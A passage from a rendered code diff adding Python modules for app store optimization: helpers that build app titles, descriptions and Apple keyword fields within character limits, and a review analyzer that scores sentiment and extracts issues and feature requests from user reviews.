'pros': ['Maximum SEO benefit', 'Clear functionality'],
|
||||||
|
'cons': ['No brand recognition', 'Generic appearance']
|
||||||
|
})
|
||||||
|
|
||||||
|
return {
|
||||||
|
'platform': self.platform,
|
||||||
|
'max_length': max_length,
|
||||||
|
'options': title_options,
|
||||||
|
'recommendation': self._recommend_title_option(title_options)
|
||||||
|
}
|
||||||
|
|
||||||
|
def optimize_description(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
target_keywords: List[str],
|
||||||
|
description_type: str = 'full'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Optimize app description with keyword integration and conversion focus.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_info: Dict with 'name', 'key_features', 'unique_value', 'target_audience'
|
||||||
|
target_keywords: List of keywords to integrate naturally
|
||||||
|
description_type: 'full', 'short' (Google), 'subtitle' (Apple)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Optimized description with analysis
|
||||||
|
"""
|
||||||
|
if description_type == 'short' and self.platform == 'google':
|
||||||
|
return self._optimize_short_description(app_info, target_keywords)
|
||||||
|
elif description_type == 'subtitle' and self.platform == 'apple':
|
||||||
|
return self._optimize_subtitle(app_info, target_keywords)
|
||||||
|
else:
|
||||||
|
return self._optimize_full_description(app_info, target_keywords)
|
||||||
|
|
||||||
|
def optimize_keyword_field(
|
||||||
|
self,
|
||||||
|
target_keywords: List[str],
|
||||||
|
app_title: str = "",
|
||||||
|
app_description: str = ""
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Optimize Apple's 100-character keyword field.
|
||||||
|
|
||||||
|
Rules:
|
||||||
|
- No spaces between commas
|
||||||
|
- No plural forms if singular exists
|
||||||
|
- No duplicates
|
||||||
|
- Keywords in title/subtitle are already indexed
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target_keywords: List of target keywords
|
||||||
|
app_title: Current app title (to avoid duplication)
|
||||||
|
app_description: Current description (to check coverage)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Optimized keyword field (comma-separated, no spaces)
|
||||||
|
"""
|
||||||
|
if self.platform != 'apple':
|
||||||
|
return {'error': 'Keyword field optimization only applies to Apple App Store'}
|
||||||
|
|
||||||
|
max_length = self.limits['keywords']
|
||||||
|
|
||||||
|
# Extract words already in title (these don't need to be in keyword field)
|
||||||
|
title_words = set(app_title.lower().split()) if app_title else set()
|
||||||
|
|
||||||
|
# Process keywords
|
||||||
|
processed_keywords = []
|
||||||
|
for keyword in target_keywords:
|
||||||
|
keyword_lower = keyword.lower().strip()
|
||||||
|
|
||||||
|
# Skip if already in title
|
||||||
|
if keyword_lower in title_words:
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Remove duplicates and process
|
||||||
|
words = keyword_lower.split()
|
||||||
|
for word in words:
|
||||||
|
if word not in processed_keywords and word not in title_words:
|
||||||
|
processed_keywords.append(word)
|
||||||
|
|
||||||
|
# Remove plurals if singular exists
|
||||||
|
deduplicated = self._remove_plural_duplicates(processed_keywords)
|
||||||
|
|
||||||
|
# Build keyword field within 100 character limit
|
||||||
|
keyword_field = self._build_keyword_field(deduplicated, max_length)
|
||||||
|
|
||||||
|
# Calculate keyword density in description
|
||||||
|
density = self._calculate_coverage(target_keywords, app_description)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'keyword_field': keyword_field,
|
||||||
|
'length': len(keyword_field),
|
||||||
|
'remaining_chars': max_length - len(keyword_field),
|
||||||
|
'keywords_included': keyword_field.split(','),
|
||||||
|
'keywords_count': len(keyword_field.split(',')),
|
||||||
|
'keywords_excluded': [kw for kw in target_keywords if kw.lower() not in keyword_field],
|
||||||
|
'description_coverage': density,
|
||||||
|
'optimization_tips': [
|
||||||
|
'Keywords in title are auto-indexed - no need to repeat',
|
||||||
|
'Use singular forms only (Apple indexes plurals automatically)',
|
||||||
|
'No spaces between commas to maximize character usage',
|
||||||
|
'Update keyword field with each app update to test variations'
|
||||||
|
]
|
||||||
|
}
|
||||||
|
|
||||||
|
def validate_character_limits(
|
||||||
|
self,
|
||||||
|
metadata: Dict[str, str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Validate all metadata fields against platform character limits.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
metadata: Dictionary of field_name: value
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Validation report with errors and warnings
|
||||||
|
"""
|
||||||
|
validation_results = {
|
||||||
|
'is_valid': True,
|
||||||
|
'errors': [],
|
||||||
|
'warnings': [],
|
||||||
|
'field_status': {}
|
||||||
|
}
|
||||||
|
|
||||||
|
for field_name, value in metadata.items():
|
||||||
|
if field_name not in self.limits:
|
||||||
|
validation_results['warnings'].append(
|
||||||
|
f"Unknown field '{field_name}' for {self.platform} platform"
|
||||||
|
)
|
||||||
|
continue
|
||||||
|
|
||||||
|
max_length = self.limits[field_name]
|
||||||
|
actual_length = len(value)
|
||||||
|
remaining = max_length - actual_length
|
||||||
|
|
||||||
|
field_status = {
|
||||||
|
'value': value,
|
||||||
|
'length': actual_length,
|
||||||
|
'limit': max_length,
|
||||||
|
'remaining': remaining,
|
||||||
|
'is_valid': actual_length <= max_length,
|
||||||
|
'usage_percentage': round((actual_length / max_length) * 100, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
validation_results['field_status'][field_name] = field_status
|
||||||
|
|
||||||
|
if actual_length > max_length:
|
||||||
|
validation_results['is_valid'] = False
|
||||||
|
validation_results['errors'].append(
|
||||||
|
f"'{field_name}' exceeds limit: {actual_length}/{max_length} chars"
|
||||||
|
)
|
||||||
|
elif remaining > max_length * 0.2: # More than 20% unused
|
||||||
|
validation_results['warnings'].append(
|
||||||
|
f"'{field_name}' under-utilizes space: {remaining} chars remaining"
|
||||||
|
)
|
||||||
|
|
||||||
|
return validation_results
|
||||||
|
|
||||||
|
def calculate_keyword_density(
|
||||||
|
self,
|
||||||
|
text: str,
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Calculate keyword density in text.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
text: Text to analyze
|
||||||
|
target_keywords: Keywords to check
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Density analysis
|
||||||
|
"""
|
||||||
|
text_lower = text.lower()
|
||||||
|
total_words = len(text_lower.split())
|
||||||
|
|
||||||
|
keyword_densities = {}
|
||||||
|
for keyword in target_keywords:
|
||||||
|
keyword_lower = keyword.lower()
|
||||||
|
count = text_lower.count(keyword_lower)
|
||||||
|
density = (count / total_words * 100) if total_words > 0 else 0
|
||||||
|
|
||||||
|
keyword_densities[keyword] = {
|
||||||
|
'occurrences': count,
|
||||||
|
'density_percentage': round(density, 2),
|
||||||
|
'status': self._assess_density(density)
|
||||||
|
}
|
||||||
|
|
||||||
|
# Overall assessment
|
||||||
|
total_keyword_occurrences = sum(kw['occurrences'] for kw in keyword_densities.values())
|
||||||
|
overall_density = (total_keyword_occurrences / total_words * 100) if total_words > 0 else 0
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_words': total_words,
|
||||||
|
'keyword_densities': keyword_densities,
|
||||||
|
'overall_keyword_density': round(overall_density, 2),
|
||||||
|
'assessment': self._assess_overall_density(overall_density),
|
||||||
|
'recommendations': self._generate_density_recommendations(keyword_densities)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _build_title_with_keywords(
|
||||||
|
self,
|
||||||
|
app_name: str,
|
||||||
|
keywords: List[str],
|
||||||
|
max_length: int
|
||||||
|
) -> Optional[str]:
|
||||||
|
"""Build title combining app name and keywords within limit."""
|
||||||
|
separators = [' - ', ': ', ' | ']
|
||||||
|
|
||||||
|
for sep in separators:
|
||||||
|
for kw in keywords:
|
||||||
|
title = f"{app_name}{sep}{kw}"
|
||||||
|
if len(title) <= max_length:
|
||||||
|
return title
|
||||||
|
|
||||||
|
return None
|
||||||
|
|
||||||
|
def _optimize_short_description(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Optimize Google Play short description (80 chars)."""
|
||||||
|
max_length = self.limits['short_description']
|
||||||
|
|
||||||
|
# Focus on unique value proposition with primary keyword
|
||||||
|
unique_value = app_info.get('unique_value', '')
|
||||||
|
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||||
|
|
||||||
|
# Template: [Primary Keyword] - [Unique Value]
|
||||||
|
short_desc = f"{primary_keyword.title()} - {unique_value}"[:max_length]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'short_description': short_desc,
|
||||||
|
'length': len(short_desc),
|
||||||
|
'remaining_chars': max_length - len(short_desc),
|
||||||
|
'keywords_included': [primary_keyword] if primary_keyword in short_desc.lower() else [],
|
||||||
|
'strategy': 'keyword_value_proposition'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _optimize_subtitle(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Optimize Apple App Store subtitle (30 chars)."""
|
||||||
|
max_length = self.limits['subtitle']
|
||||||
|
|
||||||
|
# Very concise - primary keyword or key feature
|
||||||
|
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||||
|
key_feature = app_info.get('key_features', [''])[0] if app_info.get('key_features') else ''
|
||||||
|
|
||||||
|
options = [
|
||||||
|
primary_keyword[:max_length],
|
||||||
|
key_feature[:max_length],
|
||||||
|
f"{primary_keyword} App"[:max_length]
|
||||||
|
]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'subtitle_options': [opt for opt in options if opt],
|
||||||
|
'max_length': max_length,
|
||||||
|
'recommendation': options[0] if options else ''
|
||||||
|
}
|
||||||
|
|
||||||
|
def _optimize_full_description(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Optimize full app description (4000 chars for both platforms)."""
|
||||||
|
max_length = self.limits.get('description', self.limits.get('full_description', 4000))
|
||||||
|
|
||||||
|
# Structure: Hook → Features → Benefits → Social Proof → CTA
|
||||||
|
sections = []
|
||||||
|
|
||||||
|
# Hook (with primary keyword)
|
||||||
|
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||||
|
unique_value = app_info.get('unique_value', '')
|
||||||
|
hook = f"{unique_value} {primary_keyword.title()} that helps you achieve more.\n\n"
|
||||||
|
sections.append(hook)
|
||||||
|
|
||||||
|
# Features (with keywords naturally integrated)
|
||||||
|
features = app_info.get('key_features', [])
|
||||||
|
if features:
|
||||||
|
sections.append("KEY FEATURES:\n")
|
||||||
|
for i, feature in enumerate(features[:5], 1):
|
||||||
|
# Integrate keywords naturally
|
||||||
|
feature_text = f"• {feature}"
|
||||||
|
if i <= len(target_keywords):
|
||||||
|
keyword = target_keywords[i-1]
|
||||||
|
if keyword.lower() not in feature.lower():
|
||||||
|
feature_text = f"• {feature} with {keyword}"
|
||||||
|
sections.append(f"{feature_text}\n")
|
||||||
|
sections.append("\n")
|
||||||
|
|
||||||
|
# Benefits
|
||||||
|
target_audience = app_info.get('target_audience', 'users')
|
||||||
|
sections.append(f"PERFECT FOR:\n{target_audience}\n\n")
|
||||||
|
|
||||||
|
# Social proof placeholder
|
||||||
|
sections.append("WHY USERS LOVE US:\n")
|
||||||
|
sections.append("Join thousands of satisfied users who have transformed their workflow.\n\n")
|
||||||
|
|
||||||
|
# CTA
|
||||||
|
sections.append("Download now and start experiencing the difference!")
|
||||||
|
|
||||||
|
# Combine and validate length
|
||||||
|
full_description = "".join(sections)
|
||||||
|
if len(full_description) > max_length:
|
||||||
|
full_description = full_description[:max_length-3] + "..."
|
||||||
|
|
||||||
|
# Calculate keyword density
|
||||||
|
density = self.calculate_keyword_density(full_description, target_keywords)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'full_description': full_description,
|
||||||
|
'length': len(full_description),
|
||||||
|
'remaining_chars': max_length - len(full_description),
|
||||||
|
'keyword_analysis': density,
|
||||||
|
'structure': {
|
||||||
|
'has_hook': True,
|
||||||
|
'has_features': len(features) > 0,
|
||||||
|
'has_benefits': True,
|
||||||
|
'has_cta': True
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
def _remove_plural_duplicates(self, keywords: List[str]) -> List[str]:
|
||||||
|
"""Remove plural forms if singular exists."""
|
||||||
|
deduplicated = []
|
||||||
|
singular_set = set()
|
||||||
|
|
||||||
|
for keyword in keywords:
|
||||||
|
if keyword.endswith('s') and len(keyword) > 1:
|
||||||
|
singular = keyword[:-1]
|
||||||
|
if singular not in singular_set:
|
||||||
|
deduplicated.append(singular)
|
||||||
|
singular_set.add(singular)
|
||||||
|
else:
|
||||||
|
if keyword not in singular_set:
|
||||||
|
deduplicated.append(keyword)
|
||||||
|
singular_set.add(keyword)
|
||||||
|
|
||||||
|
return deduplicated
|
||||||
|
|
||||||
|
def _build_keyword_field(self, keywords: List[str], max_length: int) -> str:
|
||||||
|
"""Build comma-separated keyword field within character limit."""
|
||||||
|
keyword_field = ""
|
||||||
|
|
||||||
|
for keyword in keywords:
|
||||||
|
test_field = f"{keyword_field},{keyword}" if keyword_field else keyword
|
||||||
|
if len(test_field) <= max_length:
|
||||||
|
keyword_field = test_field
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
return keyword_field
|
||||||
|
|
||||||
|
def _calculate_coverage(self, keywords: List[str], text: str) -> Dict[str, int]:
|
||||||
|
"""Calculate how many keywords are covered in text."""
|
||||||
|
text_lower = text.lower()
|
||||||
|
coverage = {}
|
||||||
|
|
||||||
|
for keyword in keywords:
|
||||||
|
coverage[keyword] = text_lower.count(keyword.lower())
|
||||||
|
|
||||||
|
return coverage
|
||||||
|
|
||||||
|
def _assess_density(self, density: float) -> str:
|
||||||
|
"""Assess individual keyword density."""
|
||||||
|
if density < 0.5:
|
||||||
|
return "too_low"
|
||||||
|
elif density <= 2.5:
|
||||||
|
return "optimal"
|
||||||
|
else:
|
||||||
|
return "too_high"
|
||||||
|
|
||||||
|
def _assess_overall_density(self, density: float) -> str:
|
||||||
|
"""Assess overall keyword density."""
|
||||||
|
if density < 2:
|
||||||
|
return "Under-optimized: Consider adding more keyword variations"
|
||||||
|
elif density <= 5:
|
||||||
|
return "Optimal: Good keyword integration without stuffing"
|
||||||
|
elif density <= 8:
|
||||||
|
return "High: Approaching keyword stuffing - reduce keyword usage"
|
||||||
|
else:
|
||||||
|
return "Too High: Keyword stuffing detected - rewrite for natural flow"
|
||||||
|
|
||||||
|
def _generate_density_recommendations(
|
||||||
|
self,
|
||||||
|
keyword_densities: Dict[str, Dict[str, Any]]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate recommendations based on keyword density analysis."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
for keyword, data in keyword_densities.items():
|
||||||
|
if data['status'] == 'too_low':
|
||||||
|
recommendations.append(
|
||||||
|
f"Increase usage of '{keyword}' - currently only {data['occurrences']} times"
|
||||||
|
)
|
||||||
|
elif data['status'] == 'too_high':
|
||||||
|
recommendations.append(
|
||||||
|
f"Reduce usage of '{keyword}' - appears {data['occurrences']} times (keyword stuffing risk)"
|
||||||
|
)
|
||||||
|
|
||||||
|
if not recommendations:
|
||||||
|
recommendations.append("Keyword density is well-balanced")
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _recommend_title_option(self, options: List[Dict[str, Any]]) -> str:
|
||||||
|
"""Recommend best title option based on strategy."""
|
||||||
|
if not options:
|
||||||
|
return "No valid options available"
|
||||||
|
|
||||||
|
# Prefer brand_plus_primary for established apps
|
||||||
|
for option in options:
|
||||||
|
if option['strategy'] == 'brand_plus_primary':
|
||||||
|
return f"Recommended: '{option['title']}' (Balance of brand and SEO)"
|
||||||
|
|
||||||
|
# Fallback to first option
|
||||||
|
return f"Recommended: '{options[0]['title']}' ({options[0]['strategy']})"
|
||||||
|
|
||||||
|
|
||||||
|
def optimize_app_metadata(
|
||||||
|
platform: str,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
target_keywords: List[str]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to optimize all metadata fields.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
app_info: App information dictionary
|
||||||
|
target_keywords: Target keywords list
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete metadata optimization package
|
||||||
|
"""
|
||||||
|
optimizer = MetadataOptimizer(platform)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'platform': platform,
|
||||||
|
'title': optimizer.optimize_title(
|
||||||
|
app_info['name'],
|
||||||
|
target_keywords
|
||||||
|
),
|
||||||
|
'description': optimizer.optimize_description(
|
||||||
|
app_info,
|
||||||
|
target_keywords,
|
||||||
|
'full'
|
||||||
|
),
|
||||||
|
'keyword_field': optimizer.optimize_keyword_field(
|
||||||
|
target_keywords
|
||||||
|
) if platform == 'apple' else None
|
||||||
|
}
|
||||||
714
skills/app-store-optimization/review_analyzer.py
Normal file
714
skills/app-store-optimization/review_analyzer.py
Normal file
@@ -0,0 +1,714 @@
|
|||||||
|
"""
|
||||||
|
Review analysis module for App Store Optimization.
|
||||||
|
Analyzes user reviews for sentiment, issues, and feature requests.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
from collections import Counter
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
class ReviewAnalyzer:
|
||||||
|
"""Analyzes user reviews for actionable insights."""
|
||||||
|
|
||||||
|
# Sentiment keywords
|
||||||
|
POSITIVE_KEYWORDS = [
|
||||||
|
'great', 'awesome', 'excellent', 'amazing', 'love', 'best', 'perfect',
|
||||||
|
'fantastic', 'wonderful', 'brilliant', 'outstanding', 'superb'
|
||||||
|
]
|
||||||
|
|
||||||
|
NEGATIVE_KEYWORDS = [
|
||||||
|
'bad', 'terrible', 'awful', 'horrible', 'hate', 'worst', 'useless',
|
||||||
|
'broken', 'crash', 'bug', 'slow', 'disappointing', 'frustrating'
|
||||||
|
]
|
||||||
|
|
||||||
|
# Issue indicators
|
||||||
|
ISSUE_KEYWORDS = [
|
||||||
|
'crash', 'bug', 'error', 'broken', 'not working', 'doesnt work',
|
||||||
|
'freezes', 'slow', 'laggy', 'glitch', 'problem', 'issue', 'fail'
|
||||||
|
]
|
||||||
|
|
||||||
|
# Feature request indicators
|
||||||
|
FEATURE_REQUEST_KEYWORDS = [
|
||||||
|
'wish', 'would be nice', 'should add', 'need', 'want', 'hope',
|
||||||
|
'please add', 'missing', 'lacks', 'feature request'
|
||||||
|
]
|
||||||
|
|
||||||
|
def __init__(self, app_name: str):
|
||||||
|
"""
|
||||||
|
Initialize review analyzer.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_name: Name of the app
|
||||||
|
"""
|
||||||
|
self.app_name = app_name
|
||||||
|
self.reviews = []
|
||||||
|
self.analysis_cache = {}
|
||||||
|
|
||||||
|
def analyze_sentiment(
|
||||||
|
self,
|
||||||
|
reviews: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Analyze sentiment across reviews.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reviews: List of review dicts with 'text', 'rating', 'date'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Sentiment analysis summary
|
||||||
|
"""
|
||||||
|
self.reviews = reviews
|
||||||
|
|
||||||
|
sentiment_counts = {
|
||||||
|
'positive': 0,
|
||||||
|
'neutral': 0,
|
||||||
|
'negative': 0
|
||||||
|
}
|
||||||
|
|
||||||
|
detailed_sentiments = []
|
||||||
|
|
||||||
|
for review in reviews:
|
||||||
|
text = review.get('text', '').lower()
|
||||||
|
rating = review.get('rating', 3)
|
||||||
|
|
||||||
|
# Calculate sentiment score
|
||||||
|
sentiment_score = self._calculate_sentiment_score(text, rating)
|
||||||
|
sentiment_category = self._categorize_sentiment(sentiment_score)
|
||||||
|
|
||||||
|
sentiment_counts[sentiment_category] += 1
|
||||||
|
|
||||||
|
detailed_sentiments.append({
|
||||||
|
'review_id': review.get('id', ''),
|
||||||
|
'rating': rating,
|
||||||
|
'sentiment_score': sentiment_score,
|
||||||
|
'sentiment': sentiment_category,
|
||||||
|
'text_preview': text[:100] + '...' if len(text) > 100 else text
|
||||||
|
})
|
||||||
|
|
||||||
|
# Calculate percentages
|
||||||
|
total = len(reviews)
|
||||||
|
sentiment_distribution = {
|
||||||
|
'positive': round((sentiment_counts['positive'] / total) * 100, 1) if total > 0 else 0,
|
||||||
|
'neutral': round((sentiment_counts['neutral'] / total) * 100, 1) if total > 0 else 0,
|
||||||
|
'negative': round((sentiment_counts['negative'] / total) * 100, 1) if total > 0 else 0
|
||||||
|
}
|
||||||
|
|
||||||
|
# Calculate average rating
|
||||||
|
avg_rating = sum(r.get('rating', 0) for r in reviews) / total if total > 0 else 0
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_reviews_analyzed': total,
|
||||||
|
'average_rating': round(avg_rating, 2),
|
||||||
|
'sentiment_distribution': sentiment_distribution,
|
||||||
|
'sentiment_counts': sentiment_counts,
|
||||||
|
'sentiment_trend': self._assess_sentiment_trend(sentiment_distribution),
|
||||||
|
'detailed_sentiments': detailed_sentiments[:50] # Limit output
|
||||||
|
}
|
||||||
|
|
||||||
|
def extract_common_themes(
|
||||||
|
self,
|
||||||
|
reviews: List[Dict[str, Any]],
|
||||||
|
min_mentions: int = 3
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Extract frequently mentioned themes and topics.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reviews: List of review dicts
|
||||||
|
min_mentions: Minimum mentions to be considered common
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Common themes analysis
|
||||||
|
"""
|
||||||
|
# Extract all words from reviews
|
||||||
|
all_words = []
|
||||||
|
all_phrases = []
|
||||||
|
|
||||||
|
for review in reviews:
|
||||||
|
text = review.get('text', '').lower()
|
||||||
|
# Clean text
|
||||||
|
text = re.sub(r'[^\w\s]', ' ', text)
|
||||||
|
words = text.split()
|
||||||
|
|
||||||
|
# Filter out common words
|
||||||
|
stop_words = {
|
||||||
|
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||||
|
'app', 'apps', 'very', 'really', 'just', 'but', 'not', 'you'
|
||||||
|
}
|
||||||
|
words = [w for w in words if w not in stop_words and len(w) > 3]
|
||||||
|
|
||||||
|
all_words.extend(words)
|
||||||
|
|
||||||
|
# Extract 2-3 word phrases
|
||||||
|
for i in range(len(words) - 1):
|
||||||
|
phrase = f"{words[i]} {words[i+1]}"
|
||||||
|
all_phrases.append(phrase)
|
||||||
|
|
||||||
|
# Count frequency
|
||||||
|
word_freq = Counter(all_words)
|
||||||
|
phrase_freq = Counter(all_phrases)
|
||||||
|
|
||||||
|
# Filter by min_mentions
|
||||||
|
common_words = [
|
||||||
|
{'word': word, 'mentions': count}
|
||||||
|
for word, count in word_freq.most_common(30)
|
||||||
|
if count >= min_mentions
|
||||||
|
]
|
||||||
|
|
||||||
|
common_phrases = [
|
||||||
|
{'phrase': phrase, 'mentions': count}
|
||||||
|
for phrase, count in phrase_freq.most_common(20)
|
||||||
|
if count >= min_mentions
|
||||||
|
]
|
||||||
|
|
||||||
|
# Categorize themes
|
||||||
|
themes = self._categorize_themes(common_words, common_phrases)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'common_words': common_words,
|
||||||
|
'common_phrases': common_phrases,
|
||||||
|
'identified_themes': themes,
|
||||||
|
'insights': self._generate_theme_insights(themes)
|
||||||
|
}
|
||||||
|
|
||||||
|
def identify_issues(
|
||||||
|
self,
|
||||||
|
reviews: List[Dict[str, Any]],
|
||||||
|
rating_threshold: int = 3
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Identify bugs, crashes, and other issues from reviews.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reviews: List of review dicts
|
||||||
|
rating_threshold: Only analyze reviews at or below this rating
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Issue identification report
|
||||||
|
"""
|
||||||
|
issues = []
|
||||||
|
|
||||||
|
for review in reviews:
|
||||||
|
rating = review.get('rating', 5)
|
||||||
|
if rating > rating_threshold:
|
||||||
|
continue
|
||||||
|
|
||||||
|
text = review.get('text', '').lower()
|
||||||
|
|
||||||
|
# Check for issue keywords
|
||||||
|
mentioned_issues = []
|
||||||
|
for keyword in self.ISSUE_KEYWORDS:
|
||||||
|
if keyword in text:
|
||||||
|
mentioned_issues.append(keyword)
|
||||||
|
|
||||||
|
if mentioned_issues:
|
||||||
|
issues.append({
|
||||||
|
'review_id': review.get('id', ''),
|
||||||
|
'rating': rating,
|
||||||
|
'date': review.get('date', ''),
|
||||||
|
'issue_keywords': mentioned_issues,
|
||||||
|
'text': text[:200] + '...' if len(text) > 200 else text
|
||||||
|
})
|
||||||
|
|
||||||
|
# Group by issue type
|
||||||
|
issue_frequency = Counter()
|
||||||
|
for issue in issues:
|
||||||
|
for keyword in issue['issue_keywords']:
|
||||||
|
issue_frequency[keyword] += 1
|
||||||
|
|
||||||
|
# Categorize issues
|
||||||
|
categorized_issues = self._categorize_issues(issues)
|
||||||
|
|
||||||
|
# Calculate issue severity
|
||||||
|
severity_scores = self._calculate_issue_severity(
|
||||||
|
categorized_issues,
|
||||||
|
len(reviews)
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_issues_found': len(issues),
|
||||||
|
'issue_frequency': dict(issue_frequency.most_common(15)),
|
||||||
|
'categorized_issues': categorized_issues,
|
||||||
|
'severity_scores': severity_scores,
|
||||||
|
'top_issues': self._rank_issues_by_severity(severity_scores),
|
||||||
|
'recommendations': self._generate_issue_recommendations(
|
||||||
|
categorized_issues,
|
||||||
|
severity_scores
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def find_feature_requests(
|
||||||
|
self,
|
||||||
|
reviews: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Extract feature requests and desired improvements.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reviews: List of review dicts
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Feature request analysis
|
||||||
|
"""
|
||||||
|
feature_requests = []
|
||||||
|
|
||||||
|
for review in reviews:
|
||||||
|
text = review.get('text', '').lower()
|
||||||
|
rating = review.get('rating', 3)
|
||||||
|
|
||||||
|
# Check for feature request indicators
|
||||||
|
is_feature_request = any(
|
||||||
|
keyword in text
|
||||||
|
for keyword in self.FEATURE_REQUEST_KEYWORDS
|
||||||
|
)
|
||||||
|
|
||||||
|
if is_feature_request:
|
||||||
|
# Extract the specific request
|
||||||
|
request_text = self._extract_feature_request_text(text)
|
||||||
|
|
||||||
|
feature_requests.append({
|
||||||
|
'review_id': review.get('id', ''),
|
||||||
|
'rating': rating,
|
||||||
|
'date': review.get('date', ''),
|
||||||
|
'request_text': request_text,
|
||||||
|
'full_review': text[:200] + '...' if len(text) > 200 else text
|
||||||
|
})
|
||||||
|
|
||||||
|
# Cluster similar requests
|
||||||
|
clustered_requests = self._cluster_feature_requests(feature_requests)
|
||||||
|
|
||||||
|
# Prioritize based on frequency and rating context
|
||||||
|
prioritized_requests = self._prioritize_feature_requests(clustered_requests)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_feature_requests': len(feature_requests),
|
||||||
|
'clustered_requests': clustered_requests,
|
||||||
|
'prioritized_requests': prioritized_requests,
|
||||||
|
'implementation_recommendations': self._generate_feature_recommendations(
|
||||||
|
prioritized_requests
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def track_sentiment_trends(
|
||||||
|
self,
|
||||||
|
reviews_by_period: Dict[str, List[Dict[str, Any]]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Track sentiment changes over time.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reviews_by_period: Dict of period_name: reviews
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Trend analysis
|
||||||
|
"""
|
||||||
|
trends = []
|
||||||
|
|
||||||
|
for period, reviews in reviews_by_period.items():
|
||||||
|
sentiment = self.analyze_sentiment(reviews)
|
||||||
|
|
||||||
|
trends.append({
|
||||||
|
'period': period,
|
||||||
|
'total_reviews': len(reviews),
|
||||||
|
'average_rating': sentiment['average_rating'],
|
||||||
|
'positive_percentage': sentiment['sentiment_distribution']['positive'],
|
||||||
|
'negative_percentage': sentiment['sentiment_distribution']['negative']
|
||||||
|
})
|
||||||
|
|
||||||
|
# Calculate trend direction
|
||||||
|
if len(trends) >= 2:
|
||||||
|
first_period = trends[0]
|
||||||
|
last_period = trends[-1]
|
||||||
|
|
||||||
|
rating_change = last_period['average_rating'] - first_period['average_rating']
|
||||||
|
sentiment_change = last_period['positive_percentage'] - first_period['positive_percentage']
|
||||||
|
|
||||||
|
trend_direction = self._determine_trend_direction(
|
||||||
|
rating_change,
|
||||||
|
sentiment_change
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
trend_direction = 'insufficient_data'
|
||||||
|
|
||||||
|
return {
|
||||||
|
'periods_analyzed': len(trends),
|
||||||
|
'trend_data': trends,
|
||||||
|
'trend_direction': trend_direction,
|
||||||
|
'insights': self._generate_trend_insights(trends, trend_direction)
|
||||||
|
}
|
||||||
|
|
||||||
|
def generate_response_templates(
|
||||||
|
self,
|
||||||
|
issue_category: str
|
||||||
|
